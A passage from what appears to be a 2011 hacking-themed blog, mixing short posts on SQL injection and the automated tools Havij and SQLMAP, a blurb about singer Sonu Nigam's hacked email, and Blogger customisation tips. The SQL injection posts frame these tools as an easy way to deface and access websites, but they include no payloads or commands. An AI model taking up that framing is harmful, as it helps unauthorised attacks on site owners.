technique HACKERS insert SQL codes into the login forms ( Username & Password) to deface and access the site. Now these days SQL injection is quite easy to perform with the automatic tools of SQL to hack the websites this makes script kiddies job more easy.

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page

Sunday, January 23, 2011

SQL MAP




Welcome to "HACKING begins - An approach to introduce people with the truth of HACKING",In this article I'll tell you about SQLMAP. SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating
system via out-of-band connections.

Tuesday, January 18, 2011

Sonu Nigam's email hacked !


Singer Sonu Nigam pressed the panic button when all his friends started receiving random emails, supposedly from him at a time when he was shooting for a TV show.

Sunday, January 16, 2011

Remove the Blogger Banner

To hide the Blogger Navbar :

1- Log in to blogger

2- On your Dashboard, select Layout. This will take you to the Template tab. Click Edit HTML. Under the Edit Template section you will see you blog's HTML.

3- paste the CSS definition in the top of the template code:

...
<b:skin><![CDATA[/*
-----------------------------------------------
Blogger Template Style
Name: Rounders
Designer: Douglas Bowman
URL: www.stopdesign.com
Date: 27 Feb 2004
Updated by: Blogger Team
----------------------------------------------- */

Wednesday, January 12, 2011

HOW TO CHANGE BLOGSPOT ICON AT ADDRESS BAR

The following tips are about how to replace the standard icon blogspot in the address bar into a personal icon. This is an additional creativity you can do for your blog. The goal is actually to your own unique blog identity. You would be satisfied because your blog can be different than the other standard blog, right?

Well, the first is you try to look at the picture below. That is what we mean by the standard blog icon in the address bar. In general, the site has the address bar icon on their own. Look at Google, Yahoo, Youtube and other sites. They have nice icons for their sites. Certainly very interesting, if we can change the icon address bar of our blog.


Basically, to change the icon in the address bar on Blogspot is by adding special HTML code, which is inserted into the HTML blogspot. The HTML code is as follows.